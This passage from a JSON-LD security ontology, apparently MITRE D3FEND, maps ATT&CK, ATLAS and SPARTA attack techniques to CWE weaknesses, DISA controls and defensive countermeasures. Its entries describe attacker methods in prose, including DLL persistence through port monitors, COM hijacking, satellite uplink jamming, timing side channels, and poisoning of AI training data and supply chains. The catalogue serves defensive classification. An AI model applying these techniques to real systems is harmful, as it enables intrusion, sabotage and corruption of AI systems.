      "d3f:definition": "An application that encodes digital data.",
      "rdfs:label": "Encoder Application",
      "rdfs:subClassOf": {
        "@id": "d3f:CodecApplication"
      }
    },
    {
      "@id": "d3f:CWE-1242",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1242",
      "d3f:definition": "The device includes chicken bits or undocumented features that can create entry points for unauthorized actors.",
      "rdfs:label": "Inclusion of Undocumented Features or Chicken Bits",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-284"
        },
        {
          "@id": "d3f:CWE-912"
        }
      ]
    },
    {
      "@id": "d3f:CWE-911",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-911",
      "d3f:definition": "The product uses a reference count to manage a resource, but it does not update or incorrectly updates the reference count.",
      "rdfs:label": "Improper Update of Reference Count",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:FileCreationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the creation of a new file within the system, establishing its existence and initial attributes in the file system or storage medium.",
      "rdfs:label": "File Creation Event",
      "rdfs:subClassOf": {
        "@id": "d3f:FileEvent"
      }
    },
    {
      "@id": "d3f:T1547.010",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.010",
      "d3f:definition": "Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in <code>C:\\Windows\\System32</code> and will be loaded and run by the print spooler service, `spoolsv.exe`, under SYSTEM level permissions on boot.(Citation: Bloxham)",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Port Monitors",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:N972db9505f584aa1bc901540c8c0737d"
        }
      ]
    },
    {
      "@id": "_:N972db9505f584aa1bc901540c8c0737d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:CWE-358",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-358",
      "d3f:definition": "The product does not implement or incorrectly implements one or more security-relevant checks as specified by the design of a standardized algorithm, protocol, or technique.",
      "rdfs:label": "Improperly Implemented Security Check for Standard",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-573"
        },
        {
          "@id": "d3f:CWE-693"
        }
      ]
    },
    {
      "@id": "wptmp:entity#Reference%20-%20%20CAR-2016-04-004:%20Successful%20Local%20Account%20Login",
      "d3f:kb-organization": "MITRE/NSA"
    },
    {
      "@id": "d3f:T1087.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1087.003",
      "d3f:definition": "Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)",
      "rdfs:label": "Email Account",
      "rdfs:subClassOf": {
        "@id": "d3f:T1087"
      }
    },
    {
      "@id": "d3f:PasswordFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Simple form of password database held in a single file (e.g., /etc/password)",
      "rdfs:label": "Password File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "d3f:PasswordDatabase"
        }
      ]
    },
    {
      "@id": "d3f:T1107",
      "@type": "owl:Class",
      "d3f:attack-id": "T1107",
      "d3f:definition": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1070.004",
      "rdfs:label": "File Deletion",
      "rdfs:seeAlso": {
        "@id": "d3f:T1070.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:TA0031",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Credential Access - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Credential Access"
    },
    {
      "@id": "d3f:ApplicationConfigurationHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ApplicationConfigurationHardening"
      ],
      "d3f:d3fend-id": "D3-ACH",
      "d3f:definition": "Modifying an application's configuration to reduce its attack surface.",
      "d3f:hardens": {
        "@id": "d3f:ApplicationConfiguration"
      },
      "d3f:kb-article": "## How it works\nApplication configuration settings can be configured to limit the permissions on an application or disable certain vulnerable application features.\n\nHardening an application's configuration involves analyzing not only the application but also the environment in which the application is run in for potential vulnerabilities.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-RedHatEnterpriseLinux8SecurityTechnicalImplementationGuide"
        },
        {
          "@id": "d3f:Reference-Windows10STIG"
        }
      ],
      "rdfs:label": "Application Configuration Hardening",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationHardening"
        },
        {
          "@id": "_:N34bf2617194545c8b6ad7b7e62b37b02"
        }
      ]
    },
    {
      "@id": "_:N34bf2617194545c8b6ad7b7e62b37b02",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "d3f:CCI-002688_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:FileContentRules"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system discovers indicators of compromise.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002688"
    },
    {
      "@id": "d3f:AML.T0043.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0043.000",
      "d3f:definition": "In White-Box Optimization, the adversary has full access to the target model and optimizes the adversarial example directly.\nAdversarial examples trained in this manner are most effective against the target model.",
      "rdfs:label": "White-Box Optimization - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0043.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0043"
      },
      "skos:prefLabel": "White-Box Optimization"
    },
    {
      "@id": "d3f:Attacker",
      "@type": "owl:Class",
      "d3f:definition": "An agent that attempts to exploit vulnerabilities to gain unauthorized access to data or systems.",
      "rdfs:label": "Attacker",
      "rdfs:subClassOf": {
        "@id": "d3f:Agent"
      }
    },
    {
      "@id": "d3f:Reference-SuspiciousRunLocations_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-05-002/"
      },
      "d3f:kb-abstract": "In Windows, files should never execute out of certain directory locations. Any of these locations may exist for a variety of reasons, and executables may be present in the directory but should not execute. As a result, some defenders make the mistake of ignoring these directories and assuming that a process will never run from one. There are known TTPs that have taken advantage of this fact to go undetected. This fact should inform defenders to monitor these directories more closely, knowing that they should never contain running processes.",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-05-002: Suspicious Run Locations",
      "rdfs:label": "Reference - CAR-2013-05-002: Suspicious Run Locations - MITRE"
    },
    {
      "@id": "d3f:OTSetTimeCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Set timing mechanisms.",
      "rdfs:label": "OT Set Time Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTTimeCommandEvent"
        },
        {
          "@id": "_:N4ca60d039e364852ba243059517f8556"
        }
      ]
    },
    {
      "@id": "_:N4ca60d039e364852ba243059517f8556",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTSetTimeCommand"
      }
    },
    {
      "@id": "d3f:AML.T0010",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0010",
      "d3f:definition": "Adversaries may gain initial access to a system by compromising the unique portions of the AI supply chain.\nThis could include [Hardware](/techniques/AML.T0010.000), [Data](/techniques/AML.T0010.002) and its annotations, parts of the AI [AI Software](/techniques/AML.T0010.001) stack, or the [Model](/techniques/AML.T0010.003) itself.\nIn some instances the attacker will need secondary access to fully carry out an attack using compromised components of the supply chain.",
      "rdfs:label": "AI Supply Chain Compromise - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0010"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASInitialAccessTechnique"
      },
      "skos:prefLabel": "AI Supply Chain Compromise"
    },
    {
      "@id": "d3f:SPARTATechnique",
      "@type": "owl:Class",
      "d3f:definition": "SPARTA Techniques represent 'how' a threat actor achieves a tactical goal by performing a threat action.",
      "rdfs:label": "SPARTA Technique",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/SPARTA"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAThing"
      }
    },
    {
      "@id": "d3f:LinuxSocket",
      "@type": "owl:Class",
      "d3f:definition": "Create an endpoint for communication.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/socket.2.html"
      },
      "rdfs:label": "Linux Socket",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateSocket"
      }
    },
    {
      "@id": "d3f:REC-0004",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0004",
      "d3f:definition": "Adversaries collect structured launch intelligence to forecast when and how mission assets will transition through their most time-compressed, change-prone phase. Useful elements include the launch date/time windows, launch site and range operator, participating organizations (launch provider, integrator, range safety, telemetry networks), vehicle family and configuration, fairing type, and upper-stage restart profiles. This picture enables realistic social-engineering pretexts, supply-chain targeting of contractors, and identification of auxiliary systems (range instrumentation, TLM/FTS links) that may be less hardened than the spacecraft itself. Knowledge of ascent comms (bands, beacons, ground stations), early-orbit operations (LEOP) procedures, and handovers to mission control further informs when authentication, staffing, or telemetry margins may be tight.",
      "rdfs:label": "Gather Launch Information - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0004/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAReconnaissanceTechnique"
      },
      "skos:prefLabel": "Gather Launch Information"
    },
    {
      "@id": "d3f:Estimation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-EST",
      "d3f:definition": "Estimation represents ways or a process of learning and determining the population parameter based on the model fitted to the data.",
      "d3f:kb-article": "## References\nPennsylvania State University. (n.d.). Statistical Inference and Estimation. [Link](https://online.stat.psu.edu/stat504/lesson/statistical-inference-and-estimation)",
      "rdfs:label": "Estimation",
      "rdfs:subClassOf": {
        "@id": "d3f:InferentialStatistics"
      }
    },
    {
      "@id": "d3f:AML.T0017",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0017",
      "d3f:definition": "Adversaries may develop their own capabilities to support operations. This process encompasses identifying requirements, building solutions, and deploying capabilities. Capabilities used to support attacks on AI-enabled systems are not necessarily AI-based themselves. Examples include setting up websites with adversarial information or creating Jupyter notebooks with obfuscated exfiltration code.",
      "rdfs:label": "Develop Capabilities - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0017"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Develop Capabilities"
    },
    {
      "@id": "d3f:T1481.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1481.002",
      "d3f:definition": "Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to and receiving output from a compromised system. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet.",
      "rdfs:label": "Bidirectional Communication - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1481"
      },
      "skos:prefLabel": "Bidirectional Communication"
    },
    {
      "@id": "d3f:M1018",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemCallFiltering"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "rdfs:label": "User Account Management"
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-005%3ABITSAdminDownloadFile_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-005/"
      },
      "d3f:kb-abstract": "The following query identifies Microsoft Background Intelligent Transfer Service utility bitsadmin.exe using the transfer parameter to download a remote object. In addition, look for download or upload on the command-line, the switches are not required to perform a transfer. Capture any files downloaded. Review the reputation of the IP or domain used. Typically once executed, a follow on command will be used to execute the dropped file. Note that the network connection or file modification events related will not spawn or create from bitsadmin.exe, but the artifacts will appear in a parallel process of svchost.exe with a command-line similar to svchost.exe -k netsvcs -s BITS. It’s important to review all parallel and child processes to capture any behaviors and artifacts. In some suspicious and malicious instances, BITS jobs will be created. You can use bitsadmin /list /verbose to list out the jobs during investigation.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-005: BITSAdmin Download File",
      "rdfs:label": "Reference - CAR-2021-05-005: BITSAdmin Download File - MITRE"
    },
    {
      "@id": "d3f:CCI-002470_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system only allows the use of organization-defined certificate authorities for verification of the establishment of protected sessions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:Certificate-basedAuthentication"
        },
        {
          "@id": "d3f:CertificatePinning"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002470"
    },
    {
      "@id": "d3f:WiredLink",
      "@type": "owl:Class",
      "d3f:definition": "A physical link that uses a physical conductor or waveguide to constrain and direct signal propagation between endpoints. The signal is confined within or along a manufactured medium such as metal conductors, optical fibers, or coaxial structures.",
      "rdfs:label": "Wired Link",
      "rdfs:subClassOf": {
        "@id": "d3f:PhysicalLink"
      }
    },
    {
      "@id": "d3f:TertiaryStorage",
      "@type": "owl:Class",
      "d3f:definition": "Tertiary storage or tertiary memory is memory primarily used for archiving rarely accessed information. It is primarily useful for extraordinarily large data stores. Typical examples include tape libraries and optical jukeboxes.",
      "rdfs:isDefinedBy": {
        "@id": "https://en.wikipedia.org/wiki/Computer_data_storage#Tertiary_storage"
      },
      "rdfs:label": "Tertiary Storage",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "d3f:SecondaryStorage"
        }
      ]
    },
    {
      "@id": "d3f:EX-0016.01",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0016.01",
      "d3f:definition": "The attacker transmits toward the spacecraft’s uplink receive antenna, within its main lobe or significant sidelobes, at the operating frequency and sufficient power spectral density to drive the uplink Eb/N₀ below the demodulator’s threshold. Uplink jamming prevents acceptance of telecommands and ranging/acquisition traffic, delaying or blocking scheduled operations. Because the receiver resides on the spacecraft, the jammer must be located within the spacecraft’s receive footprint and match its polarization and Doppler conditions well enough to couple energy into the front end.",
      "d3f:impairs": {
        "@id": "d3f:Receiver"
      },
      "d3f:jams": {
        "@id": "d3f:WirelessLink"
      },
      "rdfs:label": "Uplink Jamming - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0016/01/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0016"
        },
        {
          "@id": "_:N9daba428be63465798ff18fa8a00b95c"
        },
        {
          "@id": "_:N4d783aee9e1246d39a240c3f64b9c09c"
        }
      ],
      "skos:prefLabel": "Uplink Jamming"
    },
    {
      "@id": "_:N9daba428be63465798ff18fa8a00b95c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:impairs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Receiver"
      }
    },
    {
      "@id": "_:N4d783aee9e1246d39a240c3f64b9c09c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:jams"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WirelessLink"
      }
    },
    {
      "@id": "d3f:T1435",
      "@type": "owl:Class",
      "d3f:attack-id": "T1435",
      "d3f:definition": "An adversary could call standard operating system APIs from a malicious application to gather calendar entry data, or with escalated privileges could directly access files containing calendar data.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1636.001",
      "rdfs:label": "Access Calendar Entries - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1636.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Access Calendar Entries"
    },
    {
      "@id": "d3f:EXF-0002.04",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0002.04",
      "d3f:definition": "Execution time varies with inputs and branches; precise measurement turns that variance into information. The attacker times acknowledgments, response latencies, or framing gaps to learn which code paths ran (e.g., MAC verified vs. failed, table entry present vs. absent) and to infer bits of secrets in timing-sensitive routines such as cryptographic checks. On resource-constrained processors and deterministic RTOSes, small differences persist across runs, making remote timing feasible over RF if clocks and propagation are accounted for. Combined with chosen inputs and statistics, these measurements leak internal state faster than brute-force cryptanalysis.",
      "rdfs:label": "Timing Attacks - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0002/04/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EXF-0002"
      },
      "skos:prefLabel": "Timing Attacks"
    },
    {
      "@id": "d3f:T1057",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1057",
      "d3f:definition": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
      "d3f:may-invoke": [
        {
          "@id": "d3f:CreateProcess"
        },
        {
          "@id": "d3f:GetRunningProcesses"
        }
      ],
      "rdfs:label": "Process Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:Ncc40d95bf4384af0986c9f6eb15bba77"
        },
        {
          "@id": "_:N7c7a60885eba48629a0ca6ad09056b3f"
        }
      ]
    },
    {
      "@id": "_:Ncc40d95bf4384af0986c9f6eb15bba77",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N7c7a60885eba48629a0ca6ad09056b3f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetRunningProcesses"
      }
    },
    {
      "@id": "d3f:T0875",
      "@type": "owl:Class",
      "d3f:attack-id": "T0875",
      "d3f:definition": "Adversaries may attempt to change the state of the current program on a control device. Program state changes may be used to allow for another program to take over control or be loaded onto the device.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Change Program State - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSExecutionTechnique"
        },
        {
          "@id": "d3f:ATTACKICSImpairProcessControlTechnique"
        }
      ],
      "skos:prefLabel": "Change Program State"
    },
    {
      "@id": "d3f:CCI-001115_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, at managed interfaces, denies network traffic and audits internal users (or malicious code) posing a threat to external information systems.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001115"
    },
    {
      "@id": "d3f:CWE-1080",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1080",
      "d3f:definition": "A source code file has too many lines of code.",
      "rdfs:label": "Source Code File with Excessive Number of Lines of Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:T1630.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1630.003",
      "d3f:definition": "An adversary could use knowledge of the techniques used by security software to evade detection.(Citation: Brodie)(Citation: Tan) For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed \"su\" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection.(Citation: Rastogi)",
      "rdfs:label": "Disguise Root/Jailbreak Indicators - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1630"
      },
      "skos:prefLabel": "Disguise Root/Jailbreak Indicators"
    },
    {
      "@id": "d3f:T1042",
      "@type": "owl:Class",
      "d3f:attack-id": "T1042",
      "d3f:definition": "When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.001",
      "rdfs:label": "Change Default File Association",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:LogicProgramming",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LP",
      "d3f:definition": "Logic programming is a programming paradigm which is largely based on formal logic.",
      "d3f:kb-article": "## How it works\nAny program written in a logic programming language is a set of sentences in logical form, expressing facts and rules about some problem domain. Major logic programming language families include Prolog, answer set programming (ASP) and Datalog. In all of these languages, rules are written in the form of clauses:\n\nH :- B_1, ..., B_n.\n\n## References\n1. Logic programming. (2023, May 29). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Logic_programming)",
      "rdfs:label": "Logic Programming",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicAI"
      }
    },
    {
      "@id": "d3f:DS0028",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:broader": {
        "@id": "d3f:LoginSession"
      },
      "d3f:definition": "Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization",
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Login Session Metadata component",
      "rdfs:label": "Logon Session (ATT&CK DS)"
    },
    {
      "@id": "d3f:T1546.015",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.015",
      "d3f:definition": "Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model)  References to various COM objects are stored in the Registry.",
      "d3f:loads": {
        "@id": "d3f:ExecutableBinary"
      },
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "rdfs:label": "Component Object Model Hijacking",
      "rdfs:seeAlso": {
        "@id": "dbr:Component_Object_Model"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:Ne98942baf11948769a3ef50922437622"
        },
        {
          "@id": "_:N8da0e2c502ab4aaa88c60c23cf78b1fb"
        }
      ]
    },
    {
      "@id": "_:Ne98942baf11948769a3ef50922437622",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:loads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableBinary"
      }
    },
    {
      "@id": "_:N8da0e2c502ab4aaa88c60c23cf78b1fb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:CWE-409",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-409",
      "d3f:definition": "The product does not handle or incorrectly handles a compressed input with a very high compression ratio that produces a large output.",
      "rdfs:label": "Improper Handling of Highly Compressed Data (Data Amplification)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:CCI-001401_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system supports and maintains the binding of organization-defined security attributes to information in transmission.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001401"
    },
    {
      "@id": "d3f:OSAPICreateProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that creates a new process within the system.",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "OS API Create Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N7541080e9f6d4366aaaa5b4fca546bca"
        }
      ]
    },
    {
      "@id": "_:N7541080e9f6d4366aaaa5b4fca546bca",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:published",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Date of publication of the resource.",
      "rdfs:label": {
        "@language": "en",
        "@value": "date published"
      },
      "rdfs:range": {
        "@id": "xsd:dateTime"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:date"
      }
    },
    {
      "@id": "d3f:CWE-182",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-182",
      "d3f:definition": "The product filters data in a way that causes it to be reduced or \"collapsed\" into an unsafe value that violates an expected security property.",
      "rdfs:label": "Collapse of Data into Unsafe Value",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-693"
        },
        {
          "@id": "d3f:CWE-707"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1323",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1323",
      "d3f:definition": "Trace data collected from several sources on the System-on-Chip (SoC) is stored in unprotected locations or transported to untrusted agents.",
      "rdfs:label": "Improper Management of Sensitive Trace Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:AML.T0059",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0059",
      "d3f:definition": "Adversaries may poison or manipulate portions of a dataset to reduce its usefulness, reduce trust, and cause users to waste resources correcting errors.",
      "rdfs:label": "Erode Dataset Integrity - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0059"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASImpactTechnique"
      },
      "skos:prefLabel": "Erode Dataset Integrity"
    },
    {
      "@id": "d3f:OTModeSwitch",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:controls": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "d3f:definition": "A keyswitch or mode switch is the mechanism for changing the operating mode of an OT controller or device.",
      "d3f:synonym": [
        "Mode Switch",
        "Programming Key Switch"
      ],
      "rdfs:comment": "An OT Mode Switch is a dedicated mechanism, implemented as either a physical keyswitch or a software control, that permits authorized users to transition an OT controller between its operating modes.",
      "rdfs:label": "OT Mode Switch",
      "rdfs:seeAlso": [
        {
          "@id": "https://isagca.org/hubfs/2023%20ISA%20Website%20Redesigns/ISAGCA/PDFs/Industrial%20Cybersecurity%20Knowledge%20FINAL.pdf?hsLang=en"
        },
        {
          "@id": "https://www.dragos.com/blog/industry-news/value-of-plc-key-switch-monitoring/"
        }
      ],
